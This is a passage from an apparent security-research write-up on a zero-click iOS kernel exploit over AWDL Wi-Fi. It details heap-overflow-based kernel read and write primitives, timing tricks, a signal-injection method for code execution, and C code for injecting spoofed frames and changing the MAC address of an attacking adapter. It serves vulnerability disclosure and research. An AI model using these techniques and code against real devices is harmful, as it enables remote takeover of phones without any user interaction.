3) Spoof a frame from upper_peer where the length corresponds to the size of the arbitrary add. As long as the timestamp we wrote in step 1 is less than 1024 ms earlier than the target device's current current clock, and the n_frames_in_last_second is still large, we'll hit the early error return path.


To pull this off we'll need to synchronize our clocks. AWDL itself is built on accurate timing and there are timing values in each AWDL frame. But they don't really help us that much because those are relative timestamps whereas we need absolute timestamps.


Luckily we already have a restricted read primitive, and in fact we've already accidentally used it to leak a timestamp:


The same annotated hexdump from the initial read primitive when it found two neighbouring peers. At offset +0x43 in the dump we can see the per_second_timestamp value. We'd now like to leak one of these which we force to be set at an exact moment in time


We can use the initial limited arbitrary read primitive again under more controlled conditions to try to determine the clock delta like this:


1) Wait 1024 ms.


2) Spoof a frame from lower_peer, which will cause it to get a fresh per_second_timestamp.


3) When we receive an ACK, record the current timestamp on the raspberry pi.


4) Use the BSS Steering read to read lower_peer's timestamp.


5) Convert the two timestamps to the same units and compute the delta.


Now we can perform the arbitrary write as described above by using the SyncTree overflow inside upper_peer to give it a fake and valid per_second_timestamp and n_frames_in_last_second value. This works, and we can add an arbitrary byte to an arbitrary address!


Unfortunately it's not very reliable. There are too many things to go wrong here, and for a painful couple of weeks everything went wrong. Firstly, as previously discussed, the injection and monitoring hardware is just too unreliable. If we miss ACKs we end up getting the clock delta wrong, and if the clock delta is too wrong we'll panic the target. Also, we're still sending frames very slowly, and the slower this all happens the lower the probability that our fake timestamp stays valid by the time it's used. We need an approach which is going to work far more reliably.

More timing tricks

Having to synchronize the clocks is fragile. Looking more closely at the code, I realized there was another way to reach the error bail out path without manually syncing.


If we wait 1024ms then spoof a frame, the peer structure will get a fresh timestamp which will pass the timestamp check for the next 1024ms. 


We can't do that and then overflow into the n_frames_in_last_second field, because that field is after the per_second_timestamp so we'd corrupt it. But there is actually a way to corrupt the n_frames_in_last_second field without touching the timestamp:


1) Wait 1024ms then spoof a valid frame from upper_peer, giving its IO80211AWDLPeer object a valid per_second_timestamp.


2) Overflow from lower_peer into upper_peer, setting upper_peer's peer_manager pointer to 0x7c80 bytes before upper_peer's frames_in_last_second counter.


3) Spoof a valid frame from upper_peer.


Let's look more closely at exactly what will happen now:


It's now the case that this->peer_manager points 0x7c80 before peer->n_frames_in_last_second when IO80211AWDLPeer::actionFrameReport gets called on upper_peer:


  peer_manager = this->peer_manager;

  frame_len = mbuf_len(frame_mbuf);


Because we've corrupted upper_peer's peer_manager pointer, peer_manager->total_bytes_received overlaps with upper_peer->n_frames_in_last_second, meaning this add will add the frame length to upper_peer->n_frames_in_last_second! The important part is that this write happens before n_frames_in_last_second is checked!


  peer_manager->total_bytes_received += frame_len;

  ++this->n_frames_in_last_second;

  per_second_timestamp = this->per_second_timestamp;

  absolute_time_now = mach_absolute_time();

  frames_in_last_second = this->n_frames_in_last_second;


And if we're fast enough we'll still pass this check, because we have a real timestamp:


  if ( ((absolute_time_now - per_second_timestamp) / 1000000)

        > 1024 )// more than 1024ms difference

  {

     ...

  }


and now we'll also pass this check and return:


  else if ( frames_in_last_second >= 0x21 )

  {

    *(_DWORD *)(a2 + 20) = 1;

    return 0;

  }


We've now got a timestamp still valid for some portion of 1024ms and n_frames_in_last_second is very large, without having to send that many frames within the 1024ms window or having to manually synchronize the clocks.


The fourth step is then to overflow again from lower_peer to upper_peer, this time pointing peer_manager to 0x7c80 below the desired add target. Finally, spoof a frame from upper_peer, padded to the correct size for the desired add value.

Another timing trick

The final timing trick for now was to realize we could skip the initial 1024ms wait by first overflowing within upper_peer to set its timestamp to 0. Then the next valid frame spoofed from upper_peer would be sure to set a valid per_second_timestamp usable for the next 1024 ms. In this way we can use the arbitrary write quite quickly, and start building our next primitive. Except...

I'm still panicking...

Earlier I accidentally discovered another exploitable zero day. Fortunately it was fairly easy to avoid triggering it, but my exploit continued to panic the target device in a multitude of ways. Of course, as before, I'd sort of expect this and indeed I worked out a few ways in which I was potentially causing panics.


One was that when I was overwriting the peer_manager pointer I was also overwriting the flink and blink pointers of the peer in the linked list of peers. If peers had been added or removed from the list since I had taken the copy of those pointers I could now be corrupting the list, potentially adding back stale pointers or altering the order. This was bound to cause problems so I added a workaround: I would ensure that no spoofed peers ever got freed. This is simple to implement; just ensure every peer spoofs a frame around every 20 seconds or so and you'll be fine.


But my test device was still panicking, so I decided to really dig into some of the panics and work out exactly what seems to be happening. Am I accidentally triggering yet another zero-day?

More accidental zero-day

After a day or so of analysis and reversing I realize that yes, this is in fact another exploitable zero-day in AWDL. This is the third, also reachable in the default configuration of iOS.


This vulnerability took significantly more effort to understand than the double free. The condition is more subtle and boils down to a failure to clear a flag. With no upfront knowledge of the names or purposes of these flags (and there are hundreds of flags in AWDL) it required a lot of painstaking reverse engineering to work out what's going on. Let's dive in.


resetAndRemovePeerInfo is a member method of the IO80211PeerBssSteeringManager. It's called when a peer is being destructed:


IO80211PeerBssSteeringManager::resetAndRemovePeerInfo(

  IO80211AWDLPeer *peer) {

 

  struct BssSteeringCntx *cntx;

 

  if (!peer) {

    // log error and return

  }

 

  peer->added_to_fw_cache = 0;

 

  struct BssSteeringCntx* cntx = this->steering_cntx;

 

  if (cntx->peer_count) {

    for (uint64_t i = 0; i < cntx->peer_count; i++) {

      if (memcmp(&cntx->peer_macs[i], &peer->peer_mac, 6uLL) == 0) {

        memset(&cntx->peer_macs[i], 0, 6uLL); 

      }

    };

  }

  cntx->peer_count--;

}


We can see a callsite here in IO80211AWDLPeerManager::removePeer:


if (peer->added_to_fw_cache) {

  if (this->steering_manager)  {

    this->steering_manager->resetAndRemovePeerInfo(peer);

  }

}


added_to_fw_cache is a name I have given to the flag field at +0x4b8 in IO80211AWDLPeer. We can see that if a peer with that flag set is destructed then the peer manager will call the steering_manager's resetAndRemovePeerInfo method shown above.


resetAndRemovePeerInfo clears that flag then iterates through the steering context object's array of currently-being-steered peer MAC addresses. If the peer being destructed's MAC address is found in there, then it's memset to 0.


The logic already looks a little odd; they decrement peer_count but don't shrink the size of the array by swapping the empty slot with the last valid entry, meaning it will only work correctly if the peers are destructed in the exact reverse order that they were added. Kinda weird, but probably not a security vulnerability.


The logic of this function means peer_count will be decremented each time it runs. But what would happen if this function were called more times than the initial value of peer_count? In the first extra invocation the memcmp loop wouldn't execute and peer_count would be decremented from 0 to 0xffffffff, but in the second extra invocation, the peer_count is non-zero, so it would enter the memcmp/memset loop. But the only loop termination condition is i >= peer_count, so this loop will try to run 4 billion times, certainly going off the end of the 8 entry peer_macs array:


struct __attribute__((packed)) BssSteeringCntx {

/* +0x0000 */  uint32_t first_field;

/* +0x0004 */  uint32_t service_type;

/* +0x0008 */  uint32_t peer_count;

/* +0x000C */  uint32_t role;

/* +0x0010 */  struct ether_addr peer_macs[8];

/* +0x0040 */  struct ether_addr infraBSSID;

/* +0x0046 */  uint8_t pad4[6];

/* +0x004С */  uint32_t infra_channel_from_datapath_tlv;

/* +0x0050 */  uint8_t pad8[8];

/* +0x0058 */  char ssid[32];

/* +0x0078 */  uint8_t pad1[12];

/* +0x0084 */  uint32_t num_peers_added_to_umi;

/* +0x0088 */  uint8_t pad_10;

/* +0x0089 */  uint8_t pendingTransitionToNewState;

/* +0x008А */  uint8_t pad7[2];

/* +0x008C */  enum BSSSteeringState current_state;

/* +0x0090 */  uint8_t pad5[8];

/* +0x0098 */  struct IOTimerEventSource *bssSteeringExpiryTimer;

/* +0x00A0 */  struct IOTimerEventSource *bssSteeringStageExpiryTimer;

/* +0x00A8 */  uint8_t pad9[8];

/* +0x0000 */  uint32_t steering_policy;

/* +0x00B4 */  uint8_t inProgress;

}

My reverse engineered version of the BSS Steering context object. I've managed to name most of the fields.


This is only a vulnerability if it's possible to call this function peer_count+2 times. (To decrement peer_count down to 0, then set it to -1, then re-enter with peer_count = -1.)


Whether or not resetAndRemovePeerInfo is called when a peer is destructed depends only on whether that peer has the added_to_fw_cache flag set; this gives us an inequality: the number of peer's with added_to_fw_cache set must be less than or equal to peer_count+1. Probably it's really meant to be the case that peer_count should be equal to the number of peers with that flag set. Is that the case?


No, it's not. After steering fails we restart the BSS Steering state machine by sending a new BSSSteering TLV with a steeringMsgID of 6 rather than 0; this means the steering state machine gets a BSS_STEERING_REMOTE_STEERING_TRIGGER event rather than the BSS_STEERING_RECEIVED_DIRECTED_STEERING_CMD which was used to start it. This resets the steering context object, filling the peer_macs array with whatever new peer macs we specify in the new DIRECTED_STEERING_CMD TLV. If we specify different peers to those already in the context's peer_macs array, then those old entries' corresponding IO80211AWDLPeer objects don't have their added_to_fw_cache field cleared, but the new peers do get that flag set.


This means that the number of peers with the flags set becomes greater than context->peer_count, so as the peers eventually get destructed peer_count goes down to zero, underflows then causes memory corruption.


I was hitting this condition each time I restarted steering, though it would take some time for the device to actually kernel panic because the steered peers needed to timeout and get destructed.


Root causing this second bonus remotely-triggerable iOS kernel memory corruption was much harder than the first bonus double-free; the explanation given above took a few days work. It was necessary though as I had to work around both of these vulnerabilities to ensure I didn't accidentally trigger them, which in total added a significant amount of extra work. 


The work-around in this case was to ensure that I only ever restarted steering the same peers; with that change we no longer hit the peer_count underflow and only corrupt the memory we're trying to corrupt! This issue was fixed in iOS 13.6 as CVE-2020-9906.


The target is no longer randomly kernel panicking even when we don't trigger the intended Sync Tree heap overflow, so let's get back to the exploit.

Add to read

We have an arbitrary add primitive but it's not quite an arbitrary write yet. For that, we need to know the original values so we can compute the correct per-byte frame sizes to overflow each byte to write a truly arbitrary value.


Probably we'll have to use the arbitrary add to corrupt something in a peer or the peer manager such that we can get it to follow an arbitrary pointer when building an MI or PSF frame which will be sent over the air.


I went back to IDA and spent a long time looking through code to search for such a primitive, and found one in the construction of the Service Request Descriptor TLVs in MI frames:


IO80211AWDLPeerManager::buildMasterIndicationTemplate

  (char *buffer, u32 total_size ...

...

  req_desc = this->req_desc;

  if ( req_desc ){

    desc_len = req_desc->desc_len;        // length

    desc_ptr = req_desc->desc_ptr;

    tlv_len = desc_len+4;

    if (desc_len && desc_ptr && tlv_len < remaining) {

      buffer[offset] = 16; // type

      *(u16*)&buffer[offset+1] = desc_len + 1; // len

      buffer[current_buffer_offset+3] = 3;

      IO80211ServiceRequestDescriptor::copyDataOnly(

        req_desc,

        &buffer[offset+4],

        total_size - offset - 4);

    }


This is reading an IO80211ServiceRequestDescriptor object pointer from the peer manager from which it reads another pointer and a length. If there's space in the MI frame for that length of buffer then it calls the RequestDescriptor's copyDataOnly method, which simply copies from the RequestDescriptor into the MI frame template. It's only reading these two pointer and length fields which are at offset +0x40 and +0x54 in the request descriptor, so by pointing the IO80211AWDLPeerManager's req_desc pointer to data we control we can cause the next MI template which is generated to contain data read from an arbitrary address, this time with no restrictions on the data being read.


We can use the limited read primitive we currently have to read the existing value of the req_desc pointer, we just need to find somewhere below it in the peer_manager object where we know there will always be a fixed, small dword we can use as the length value needed for the read. Indeed, a few bytes below this there is such a value.


The first trick is in choosing somewhere to point the req_desc pointer to. We want to choose somewhere where we can easily update the read target without having to trigger the memory corruption. From reading the TLV parsing code I knew there were some TLVs which have very little processing. A good example, and the one I chose to use, is the NSync TLV. The only processing is to check that the total TLV length including the header is less than or equal to 0x40. That entire TLV is then memcpy'ed into a 0x40 byte buffer in the peer object at offset +0x4c4:


memcpy(this->nsync_tlv_buf, tlv_ptr, tlv_total_len);


We can use the arbitrary write to point the peer_manager's req_desc pointer to just below the lower_peer's nsync_tlv buffer such that by spoofing NSync TLVs from lower_peer we can update the fake descriptor pointer and length values.


Some care needs to be taken when corrupting the req_desc pointer however as we can currently only do byte-by-byte writes and the req_desc pointer might be read while we are corrupting it. We therefore need a way to stop those reads.


IO80211AWDLPeerManager::updateBroadcastMI is on the critical path for the read, meaning that every time the MI frame is updated it must go through this function, which contains the following check:


if (this->frames_outstanding <= this->frames_limit) {

  IO80211AWDLPeerManager::updatePrimaryPayloadMI(...


frames_limit is initialized to a fixed value of 3. If we first use the arbitrary add to make frames_outstanding very large, this check will fail and the MI template won't be updated, and the req_desc member won't be read. Then after we're done corrupting the req_desc pointer we can set this value back to its original value and the MI templates will be updated again and the arbitrary read will work.


An easy way to do this is to add 0x80 to the most-significant byte of frames_outstanding. The first time we do this it will make frames_outstanding very large. If it were 2 to begin with it would go from: 0x00000002 to 0x80000002.


Adding 0x80 to that MSB as second time would cause it to then overflow back 0, resetting the value to 2 again. This of course has the side effect of adding 1 to the next dword field in the peer_manager when it overflows, but fortunately this doesn't cause any problems.


Now by spoofing an NSync TLV from lower_peer and monitoring for a change in the contents of the 0x10 TLV sent by the target in MI frames we can read arbitrary kernel data from arbitrary addresses.

Speedy reader

We now have a truly arbitrary read, but unfortunately it can be a bit slow. Sometimes it takes a few seconds for the MI template to be updated. What we need is a way to force the MI template to be regenerated on demand.


Looking through the cross references to IO80211AWDLPeerManager::updateBroadcastMI I noticed that it seems the MI template gets regenerated each time the peer bloom filter gets updated in IO80211AWDLPeerManager::updatePeerListBloomFilter. As we saw much earlier in this post, and I had determined months before this point, the bloom filter code isn't used. But... we have an arbitrary add so we could just turn it on!


Indeed, by flipping the flag at +0x5950 in the IO80211AWDLPeerManager we can enable the peer bloom filter code.


With peer bloom filters enabled each time the target sees a new peer, it regenerates the MI template in order to ensure it's broadcasting an up-to-date bloom filter containing all the peers it knows about (or at least the first 256 in the peer list.) This means we can make our arbitrary read much much faster: we just need to send the correct NSync TLV containing our read target then spoof a new peer and wait for an updated MI. With this technique complete we can read arbitrary remote kernel memory over the air at a rate of many kilobytes per second.

Remote kernel memory read/write API

At this point we can build the typical abstraction layer used by a local privilege escalation exploit, except this time it's remote.


The main kernel memory read function is:


void* rkbuf(uint64_t kaddr, uint32_t len);


With some helpers to make the code simpler:


uint64_t rk64(uint64_t kaddr);

uint32_t rk32(uint64_t kaddr);

uint8_t rk8(uint64_t kaddr);


Similarly for writing kernel memory, we have the main write method:


void wk8(uint64_t kaddr, uint8_t desired_byte);


and some helpers:


void wkbuf(uint64_t kaddr, uint8_t* desired_value, uint32_t len);

void wk64(uint64_t kaddr, uint64_t desired_value);

void wk32(uint64_t kaddr, uint32_t desired_value);


From this point the exploit code starts to look a lot more like a regular local privilege escalation exploit and the remote aspect is almost completely abstracted away.

Popping calc with 15 bytes

This is already enough to pop calc. To do this we just need a way to inject a control flow edge into userspace somehow. A bit of grepping through the XNU code and I stumbled across the code handling BSD signal delivery which seemed promising.


Each process structure has an array of signal handlers; one per signal number.


struct sigacts {

  user_addr_t ps_sigact[NSIG];   /* disposition of signals */

  user_addr_t ps_trampact[NSIG]; /* disposition of signals */

  ...


The ps_trampact array contains userspace function pointers. When the kernel wants a userspace process to handle a signal it looks up the signal number in that array:


  trampact = ps->ps_trampact[sig];


then sets the userspace thread's pc value to that:


  sendsig_set_thread_state64(

    &ts.ts64.ss,

    catcher,

    infostyle,

    sig,

    (user64_addr_t)&((struct user_sigframe64*)sp)->sinfo,

    (user64_addr_t)p_uctx,

    token,

    trampact,

    sp,

    th_act)


Where sendsig_set_thread_state64 looks like this:


static kern_return_t

sendsig_set_thread_state64(arm_thread_state64_t *regs,

                           user64_addr_t catcher,

                           int infostyle,

                           int sig,

                           user64_addr_t p_sinfo,

                           user64_addr_t p_uctx,

                           user64_addr_t token,

                           user64_addr_t trampact,

                           user64_addr_t sp,

                           thread_t th_act) {

  regs->x[0] = catcher;

  regs->x[1] = infostyle;

  regs->x[2] = sig;

  regs->x[3] = p_sinfo;

  regs->x[4] = p_uctx;

  regs->x[5] = token;

  regs->pc = trampact;

  regs->cpsr = PSR64_USER64_DEFAULT;

  regs->sp = sp;

 

  return thread_setstatus(th_act,

                          ARM_THREAD_STATE64,

                          (void *)regs,

                          ARM_THREAD_STATE64_COUNT);

}


The catcher value in X0 is also completely controlled, read from the ps_sigact array.


Note that the kernel APIs for setting userspace register values don't require userspace pointer authentication codes.


We can set X0 to the constant CFString "com.apple.calculator" already present in the dyld_shared_cache. On 13.3 on the 11 Pro this is at 0x1BF452778 in an unslid shared cache.


We set PC to this gadget in CommunicationSetupUI.framework:


MOV  W1, #0

BL   _SBSLaunchApplicationWithIdentifier


This clears W1 then calls SBSLaunchApplicationWithIdentifier, a Springboard Services Framework private API for launching apps.


The final piece of this puzzle is finding a process to inject the fake signal into. It needs to have the com.apple.springboard.launchapplications entitlement in order for Springboard to process the launch request. Using Jonathan Levin's entitlement database it's easy to find the list of injection candidates.


We remotely traverse the linked list of running processes looking for a victim, set a fake signal handler then make a thread in that process believe it has to handle a signal by OR'ing in the correct signal number in the uthread's siglist bitmap of pending signals:


wk8(uthread+0x10c+3, 0x40); // uthread->siglist


and finally making the thread believe it needs to handle a BSD AST:


wk8_no_retry(thread+0x2e8, 0x80); // thread->act |= AST_BSD


Now, when this thread gets scheduled and tries to handling pending ASTs, it will try to handle our fake signal and a calculator will appear:


An iPhone 11 Pro running Calculator.app with a monitor in the background displaying the output from the final stage of the AWDL exploit

Improving the bootstrap BSS steering read

We've popped calc, we're done! Or are we? It's kinda slow, and there's no real reason for it to be so slow. We managed to build quite a fast arbitrary read primitive so that's not the bottleneck. The major bottleneck at the moment is the initial BSS Steering-based read. It's taking 8 seconds per read because it needs the state machine to time out between each attempt.


As we saw, however, the BSS Steering TLV indicates that we should be able to steer up to 8 peers at the same time, meaning that we should be able to improve our read speed by at least 8x. In fact, if we can get away with 8 or fewer initial reads our read speed could be much faster than that.


However, when you try to steer 8 peers simultaneously, it doesn't quite work as expected:


When multiple peers are steered the UMIs flood the airwaves. In this example I was steering 8 peers but the frames are dominated by UMIs to the first peer. You can see a handful of UMIs to :06, and one to :02 amongst the dozens to :00.


Testing against MacOS we also see the following log message:


Peer 22:22:aa:22:00:00 DID NOT ack our UMI


When the target tries to steer 8 peers at the same time it starts flooding the airwaves with UMI frames directed at the target peers - so many in fact that it never actually manages to send the UMIs for all 8 steering targets before timing out.


We've already covered how to stall the initial sending of UMIs by controlling the channel sequence, but it looks like we're also going to have to ACK the UMI frames.

ACK a MAC?

As we saw earlier, ACKs in 80211.a and g are timing based. To ACK a frame you have to send the ACK in the short window following the transmission of the frame. We definitely can't do that using libpcap, the timing needs microsecond precision. We probably can't even do that with a custom kernel driver.


There is however an obscure WiFi adaptor monitor mode feature called "Active Monitor Mode", supported by very few chipsets.


Active monitor mode allows you to inject and monitor arbitrary frames as usual, except in active monitor mode (as opposed to regular monitor mode) the adaptor will still ACK frames if they're being sent to its MAC address.


The Mediatek MT76 chipset was the only one I could find with a USB adaptor that supports this feature. I bought a bunch of MT76-based adaptors and the only one where I could actually get this feature to work was the ZyXEL NWD6605 which uses an mt76x2u chipset.


The only issue was that I could only get Active Monitor Mode to actually work when running at 12 Mbps on a 5GHz channel but my current setup was using adaptors which were not capable of 5GHz injection.

Moving to 5GHz

I had tried right back at the beginning of the exploit development process to get 5GHz injection and monitoring to work; after trying for a week with lots of adaptors and building many, many branches of kernel drivers and fiddling with radiotap headers I had given up and decided to focus on getting something working on 2.4GHz with my old adaptors.


This time around I just bought all the adaptors I could find which looked like they might have even the remotest possibility of working and tried again.


One of the challenges is that OEMs won't consistently use the same chipset or revision of chipset in a device, which means getting hold of a particular chipset and revision can be a hit-and-miss process.


Here are all the adaptors which I used during this exploit to try to find support for the features I wanted:


All the WiFi adaptors tested during this exploit development process, from top left to bottom right: D-Link DWA-125, Netgear WG111-v2, Netgear A6210, ZyXEL NWD6605, ASUS USB-AC56, D-Link DWA-171, Vivanco 36665, tp-link Archer T1U, Microsoft Xbox wireless adaptor Model 1790, Edimax EW-7722UTn V2, FRITZ!WLAN AC430M, ASUS USB-AC68, tp-link AC1300


In the end I required two different adaptors to get the features I wanted:


Active monitor mode and frame injection: ZyXEL NWD6605 using mt76x2u driver


Monitor mode (including management and ACK frames): Netgear A6210 using rtl8812au driver


With this setup I was able to get frame injection, monitor mode sniffing of all frames including management and ACK frames as well as Active monitor mode to work at 12 Mbps on channel 44.

Working with Active Monitor Mode

You can enable the feature like this:


ip link set dev wlan1 down

iw dev wlan1 set type monitor

iw dev wlan1 set monitor active control otherbss

ip link set dev wlan1 up

iw dev wlan1 set channel 44


We can change the card's MAC address using the ip tool like this:


ip link set dev wlan1 down

ip link set wlan1 address 44:44:22:22:22:22

ip link set dev wlan1 up


Changing the MAC address like this takes at least a second and the interface has to be down. Since we're trying to make these reads as fast as possible I decided to take a look at how this mac address changing actually worked to see if I could speed it up...


Three ways to set a MAC: 1 - ioctl

The old way to set a network device MAC address is to use the SIOCSIFHWADDR ioctl:


struct ifreq ifr = {0};

uint8_t mac[6] = {0x22, 0x23, 0x24, 0x00, 0x00, 0x00};

memcpy(&ifr.ifr_hwaddr.sa_data[0], mac, 6);

int s = socket(AF_INET, SOCK_DGRAM, 0);

strcpy(ifr.ifr_name, "wlan1");

ifr.ifr_hwaddr.sa_family = ARPHRD_ETHER;

int ret = ioctl(s, SIOCSIFHWADDR, &ifr);

printf("ioctl retval: %d\n", ret);


This interface is deprecated and doesn't work at all for this driver.


Three ways to set a MAC: 2 - netlink

The current supported interface is netlink. It took a whole day to learn enough about netlink to write a standalone PoC to change a MAC address. Netlink is presumably very powerful but also quite obtuse. And even after all that (perhaps unsurprisingly) it's no faster than the command line tool which is really just making these same netlink API calls too.


Check out change_mac_nl.c in the released exploit source code to see the netlink code.


Three ways to set a MAC: 3 - hacker

Trying to do this the supported way has failed, it's just way too slow. But thinking about it, what is the MAC anyway? It's almost certainly just some field stored in flash or RAM on the chipset and yes, diving in to the mt76x2u linux kernel driver source and tracing the functions which set the MAC address we can see that ends up writing to some configuration registers on the chip:


#define MT_MAC_ADDR_DW0 0x1008

#define MT_MAC_ADDR_DW1 0x100c

 

void mt76x02_mac_setaddr(struct mt76x02_dev *dev, const u8 *addr)

{

  static const u8 null_addr[ETH_ALEN] = {};

  int i;

 

  ether_addr_copy(dev->mt76.macaddr, addr);

 

  if (!is_valid_ether_addr(dev->mt76.macaddr)) {

    eth_random_addr(dev->mt76.macaddr);

    dev_info(dev->mt76.dev,

             "Invalid MAC address, using random address %pM\n",

             dev->mt76.macaddr);

  }

 

  mt76_wr(dev,

          MT_MAC_ADDR_DW0,

          get_unaligned_le32(dev->mt76.macaddr));

 

  mt76_wr(dev,

          MT_MAC_ADDR_DW1,

          get_unaligned_le16(dev->mt76.macaddr + 4) |

            FIELD_PREP(MT_MAC_ADDR_DW1_U2ME_MASK, 0xff));

   ...


I wonder if I could just write directly to those configuration registers? Would it completely blow up? Or would it just work? Is there an easy way to do this or will I have to patch the driver?


Looking around the driver a bit we can see it has a debugfs interface. Debugfs is a very neat way for drivers to easily expose lots of internal stuff out to userspace, restricted to root, for logging and monitoring as well as for messing around with:


[email protected]:/sys/kernel/debug/ieee80211/phy7/mt76# ls

agc  ampdu_stat  dfs_stats  edcca  eeprom  led_pin  queues  rate_txpower  regidx  regval  temperature  tpc  tx_hang_reset  txpower


What we're after is a way to write to arbitrary control registers, and these two debugfs files let you do exactly that:


# cat regidx

0

# cat regval

0x76120044


If you write the address of the configuration register you want to read or write to the regidx file as a decimal value then reading or writing the regval file lets you read or write that configuration register as a 32-bit hexadecimal value. Note that exposing configuration registers this way is a feature of this particular driver's debugfs interface, not a generic feature of debugfs. With this we can completely skip the netlink interface and the requirement to bring the device down and instead directly manipulate the internal state of the adaptor.


I replace the netlink code with this:


void mt76_debugfs_change_mac(char* phy_str, struct ether_addr new_mac) {

    union mac_dwords {

      struct ether_addr new_mac;

      uint32_t dwords[2];

    } data = {0};

 

    data.new_mac = new_mac;

 

    char lower_dword_hex_str[16] = {0};

    snprintf(lower_dword_hex_str, 16, "0x%08x\n", data.dwords[0]);

 

    char upper_dword_hex_str[16] = {0};

    snprintf(upper_dword_hex_str, 16, "0x%08x\n", data.dwords[1]);

 

    char* regidx_path = NULL;

    asprintf(&regidx_path,

             "/sys/kernel/debug/ieee80211/%s/mt76/regidx",

             phy_str);

 

    char* regval_path = NULL;

    asprintf(&regval_path,

             "/sys/kernel/debug/ieee80211/%s/mt76/regval",

             phy_str);

 

    file_write_string(regidx_path, "4104\n");

    file_write_string(regval_path, lower_dword_hex_str);

 

    file_write_string(regidx_path, "4108\n");

    file_write_string(regval_path, upper_dword_hex_str);

 

    free(regidx_path);

    free(regval_path);   

}


and... it works! The adaptor instantly starts ACKing frames to whichever MAC address we write in to the MAC address field in the adaptor's configuration registers.


All that's then required is a rewrite of the early read code:


Now it starts out steering 8 stalled peers. Each time a read is requested, if there's still time left before steering will timeout and there are still stalled peers, one stalled peer is chosen, has it's steering_msg_blob pointer corrupted with the read target and gets unstalled. The target will start sending UMIs to that peer, we set the correct MAC address on the active monitor device, sniff the UMI and ACK it to stop the peer sending more. From the UMI we extract the value from TLV 0x1d and get the disclosed kernel memory.


If there are no more stalled peers, or steering has timed out, we wait a safe amount of time until we're able to restart all 8 peers and start again:


struct ether_addr reader_peers[8];

 

struct early_read_params {

    struct ether_addr dst;

    char* phy_str;

} er_para;

 

void init_early_read(struct ether_addr dst, char* phy_str) {

  er_para.dst = dst;

  er_para.phy_str = phy_str;

 

  reader_peers[0] = *(ether_aton("22:22:aa:22:00:00"));

  reader_peers[1] = *(ether_aton("22:22:aa:22:00:01"));

  reader_peers[2] = *(ether_aton("22:22:aa:22:00:02"));

  reader_peers[3] = *(ether_aton("22:22:aa:22:00:03"));

  reader_peers[4] = *(ether_aton("22:22:aa:22:00:04"));

  reader_peers[5] = *(ether_aton("22:22:aa:22:00:05"));

  reader_peers[6] = *(ether_aton("22:22:aa:22:00:06"));

  reader_peers[7] = *(ether_aton("22:22:aa:22:00:07"));

}

 

// state required between early reads:

uint64_t steering_begin_timestamp = 0;

int n_steered_peers = 0;

 

void* try_early_read(uint64_t kaddr, size_t* out_size) {

  struct ether_addr peer_b = *(ether_aton("22:22:bb:22:00:00"));

  int n_peers = 8;

  struct ether_addr reader_peer;

  int should_restart_steering = 0;

 

  // what phase are we in?

 

  uint64_t milliseconds_since_last_steering =

    (now_nanoseconds() - steering_begin_timestamp) /

    (1ULL*1000ULL*1000ULL);

  

  if (milliseconds_since_last_steering < 5000 &&

      n_steered_peers < 8) {

    // if less than 5 seconds have elapsed since we started steering

    // and we haven't reached the peer limit, then steer the next peer

 

    reader_peer = reader_peers[n_steered_peers++];

 

  } else if (milliseconds_since_last_steering < 8000) {

    // wait for the steering machine to timeout so we can restart it

    usleep((8000 - milliseconds_since_last_steering) * 1000);

    should_restart_steering = 1;

  } else {

    // more than 8 seconds have already elapsed since we last 

    //started steering (or we've never started it) so restart

    should_restart_steering = 1;

  }

 

  if (should_restart_steering) {

    // make reader peers suitable for bss steering

    n_steered_peers = 0;

 

    for (int i = 0; i < n_peers; i++) {

      inject(RT(),

          WIFI(er_para.dst, reader_peers[i]),

          AWDL(),

          SYNC_PARAMS(),

          CHAN_SEQ_EMPTY(),

          HT_CAPS(),

          UNICAST_DATAPATH(0x1307 | 0x800),

          PKT_END());

    }

 

    inject(RT(),

           WIFI(er_para.dst, peer_b),

           AWDL(),

           SYNC_PARAMS(),

           HT_CAPS(),

           UNICAST_DATAPATH(0x1307),

           BSS_STEERING_0(reader_peers, n_peers),

           PKT_END());

 

    steering_begin_timestamp = now_nanoseconds();

    reader_peer = reader_peers[n_steered_peers++];

  }

 

  char overflower[128] = {0};

  *(uint64_t*)(&overflower[0x50]) = kaddr;

 

  // set the card's MAC to ACK the UMI from the target

  mt76_debugfs_change_mac(er_para.phy_str, reader_peer);

 

  inject(RT(),

      WIFI(er_para.dst, reader_peer),

      AWDL(),

      SYNC_PARAMS(),

      SERV_PARAM(),

      HT_CAPS(),

      DATAPATH(reader_peer),

      SYNC_TREE((struct ether_addr*)overflower,

                sizeof(overflower)/sizeof(struct ether_addr)),

      PKT_END());

 

  // try to receive a UMI:

  void* steering_tlv = try_get_TLV(0x1d);

 

  if (steering_tlv) {

    struct mini_tlv {

      uint8_t type;

      uint16_t len;

    } __attribute__((packed));

    *out_size = ((struct mini_tlv*)steering_tlv)->len+3;

  } else {

    printf("didn't get TLV\n");

  }

 

  // NULL out the bsssteering blob

  char null_overflower [128] = {0};

  inject(RT(),

      WIFI(er_para.dst, reader_peer),

      AWDL(),

      SYNC_PARAMS(),

      SERV_PARAM(),

      HT_CAPS(),

      DATAPATH(reader_peer),

      SYNC_TREE((struct ether_addr*)null_overflower,

                sizeof(null_overflower)/sizeof(struct ether_addr)),

      PKT_END());

 

  // the active monitor interface doesn't always manage to ACK

  // the first frame, give it a chance

  usleep(1*1000);

 

  return steering_tlv;

}

Demo

With some luck we can bootstrap the faster read primitive with 8 or fewer early reads which means on an iPhone 11 Pro with AWDL enabled popping calc now looks like this:


In this demo AWDL has been manually enabled by opening the sharing panel in the Photos app. This keeps the AWDL interface active. The exploit gains arbitrary kernel memory read and write within a few seconds and is able to inject a signal into a userspace process to cause it to JOP to a single gadget which opens Calculator.app

Zero clicks

I mentioned that AWDL has to be enabled, it isn't always on. In order to make this an interactionless zero-click exploit which can target any device in radio proximity we therefore need a way to force devices to enable their AWDL interface.


AWDL is used for many things. For example, my iPhone seems to turn on AWDL when it receives a voicemail because it really wants to Airplay the voicemail to my Apple TV. But sending someone a voicemail requires their phone number, and we're looking for an attack which requires no identifiers or non-default settings.


The second research paper from the SEEMOO labs team demonstrated an attack to enable AWDL using Bluetooth low energy advertisements to force arbitrary devices in radio proximity to enable their AWDL interfaces for Airdrop. SEEMOO didn't publish their code for this attack so I decided to recreate it myself.

Enabling AWDL

In the iOS photos app when you select the sharing dialog and click "Airdrop" a list of iOS and MacOS devices nearby appears, all of which you can send your photo to. Most people don't want random passers-by sending them unsolicited photos so the default AirDrop sharing setting is "Contacts Only" meaning you will only see AirDrop sharing requests from users in your contacts book. But how does this work? For an in-depth discussion, check out the SEEMOO labs paper.


